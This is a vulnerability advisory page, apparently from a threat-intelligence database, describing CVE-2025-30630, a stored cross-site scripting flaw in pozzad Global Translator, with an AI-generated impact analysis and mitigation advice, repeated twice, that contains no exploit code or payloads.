CVE-2025-30630: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in pozzad Global Translator
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in pozzad Global Translator allows Stored XSS. This issue affects Global Translator: from n/a through 2.0.2.
AI Analysis
Technical Summary
CVE-2025-30630 is a medium-severity Stored Cross-Site Scripting (XSS) vulnerability classified under CWE-79 (Improper Neutralization of Input During Web Page Generation) affecting the pozzad Global Translator software up to version 2.0.2. Stored XSS occurs when malicious input is persistently stored by the application and later rendered in web pages without proper sanitization or encoding, allowing attackers to execute arbitrary JavaScript in the context of other users' browsers. This vulnerability enables an attacker with authenticated access (as indicated by the CVSS vector requiring privileges and user interaction) to inject malicious scripts that can compromise confidentiality, integrity, and availability of user sessions. The CVSS score of 5.9 reflects a medium severity, with network attack vector, low attack complexity, but requiring privileges and user interaction, and a scope change indicating that the vulnerability affects components beyond the initially vulnerable one. Exploitation could lead to data leakage (confidentiality impact), modification of displayed content or user actions (integrity impact), and potential disruption of service or user experience (availability impact). No public exploits are currently known, and no patches have been linked yet, which suggests that organizations using this software should proactively monitor for updates and consider mitigation strategies. The vulnerability affects all versions up to 2.0.2, with no specific earliest affected version noted. The vulnerability was published on June 6, 2025, and reserved in March 2025, indicating recent discovery and disclosure.
Potential Impact
For European organizations using pozzad Global Translator, this vulnerability poses a risk primarily to web application security and user data integrity. Stored XSS can be leveraged to hijack user sessions, steal sensitive information such as authentication tokens, or perform unauthorized actions on behalf of users. In environments where Global Translator is integrated into business workflows, such as translation services for internal or client communications, exploitation could lead to leakage of confidential information or manipulation of translated content, potentially impacting business operations and compliance with data protection regulations like GDPR. The requirement for authenticated access limits the attack surface but does not eliminate risk, especially in organizations with many users or where credentials may be compromised. Additionally, the scope change in the CVSS vector suggests that the vulnerability could affect multiple components or services, increasing potential impact. The lack of known exploits in the wild reduces immediate risk but should not lead to complacency. European organizations must consider the reputational and regulatory consequences of a successful attack, especially in sectors handling sensitive or personal data.
Mitigation Recommendations
1. Immediate mitigation should include restricting access to the Global Translator application to trusted users and networks, minimizing the number of users with privileges required to exploit this vulnerability. 2. Implement strict input validation and output encoding on all user-supplied data within the application, particularly focusing on areas where user input is stored and later rendered in web pages. 3. Employ Content Security Policy (CSP) headers to reduce the impact of potential XSS by restricting the execution of unauthorized scripts. 4. Monitor application logs and user activity for unusual behavior indicative of XSS exploitation attempts. 5. Since no patches are currently linked, maintain close communication with the vendor for timely updates and apply patches immediately upon release. 6. Conduct security awareness training for users to recognize phishing or social engineering attempts that could lead to credential compromise. 7. Consider deploying Web Application Firewalls (WAF) with rules tailored to detect and block XSS payloads targeting this application. 8. Review and harden authentication mechanisms to prevent unauthorized access that could facilitate exploitation.
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Poland
CVE-2025-30630: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in pozzad Global Translator
Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in pozzad Global Translator allows Stored XSS. This issue affects Global Translator: from n/a through 2.0.2.
AI-Powered Analysis
Technical Analysis
CVE-2025-30630 is a medium-severity Stored Cross-Site Scripting (XSS) vulnerability classified under CWE-79 (Improper Neutralization of Input During Web Page Generation) affecting the pozzad Global Translator software up to version 2.0.2. Stored XSS occurs when malicious input is persistently stored by the application and later rendered in web pages without proper sanitization or encoding, allowing attackers to execute arbitrary JavaScript in the context of other users' browsers. This vulnerability enables an attacker with authenticated access (as indicated by the CVSS vector requiring privileges and user interaction) to inject malicious scripts that can compromise confidentiality, integrity, and availability of user sessions. The CVSS score of 5.9 reflects a medium severity, with network attack vector, low attack complexity, but requiring privileges and user interaction, and a scope change indicating that the vulnerability affects components beyond the initially vulnerable one. Exploitation could lead to data leakage (confidentiality impact), modification of displayed content or user actions (integrity impact), and potential disruption of service or user experience (availability impact). No public exploits are currently known, and no patches have been linked yet, which suggests that organizations using this software should proactively monitor for updates and consider mitigation strategies. The vulnerability affects all versions up to 2.0.2, with no specific earliest affected version noted. The vulnerability was published on June 6, 2025, and reserved in March 2025, indicating recent discovery and disclosure.
Potential Impact
For European organizations using pozzad Global Translator, this vulnerability poses a risk primarily to web application security and user data integrity. Stored XSS can be leveraged to hijack user sessions, steal sensitive information such as authentication tokens, or perform unauthorized actions on behalf of users. In environments where Global Translator is integrated into business workflows, such as translation services for internal or client communications, exploitation could lead to leakage of confidential information or manipulation of translated content, potentially impacting business operations and compliance with data protection regulations like GDPR. The requirement for authenticated access limits the attack surface but does not eliminate risk, especially in organizations with many users or where credentials may be compromised. Additionally, the scope change in the CVSS vector suggests that the vulnerability could affect multiple components or services, increasing potential impact. The lack of known exploits in the wild reduces immediate risk but should not lead to complacency. European organizations must consider the reputational and regulatory consequences of a successful attack, especially in sectors handling sensitive or personal data.
Mitigation Recommendations
1. Immediate mitigation should include restricting access to the Global Translator application to trusted users and networks, minimizing the number of users with privileges required to exploit this vulnerability. 2. Implement strict input validation and output encoding on all user-supplied data within the application, particularly focusing on areas where user input is stored and later rendered in web pages. 3. Employ Content Security Policy (CSP) headers to reduce the impact of potential XSS by restricting the execution of unauthorized scripts. 4. Monitor application logs and user activity for unusual behavior indicative of XSS exploitation attempts. 5. Since no patches are currently linked, maintain close communication with the vendor for timely updates and apply patches immediately upon release. 6. Conduct security awareness training for users to recognize phishing or social engineering attempts that could lead to credential compromise. 7. Consider deploying Web Application Firewalls (WAF) with rules tailored to detect and block XSS payloads targeting this application. 8. Review and harden authentication mechanisms to prevent unauthorized access that could facilitate exploitation.
Affected Countries
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Data Version
- 5.1
- Assigner Short Name
- Patchstack
- Date Reserved
- 2025-03-24T13:01:06.201Z
- Cvss Version
- 3.1
- State
- PUBLISHED
Threat ID: 6842eddb71f4d251b5c87f97
Added to database: 6/6/2025, 1:32:11 PM
Last enriched: 7/8/2025, 6:41:37 AM
Last updated: 8/3/2025, 4:24:17 AM
Views: 13
Related Threats
CVE-2025-9000: Uncontrolled Search Path in Mechrevo Control Center GX V2
HighCVE-2025-8993: SQL Injection in itsourcecode Online Tour and Travel Management System
MediumCVE-2025-8992: Cross-Site Request Forgery in mtons mblog
MediumCVE-2025-8991: Business Logic Errors in linlinjava litemall
MediumCVE-2025-8990: SQL Injection in code-projects Online Medicine Guide
MediumActions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.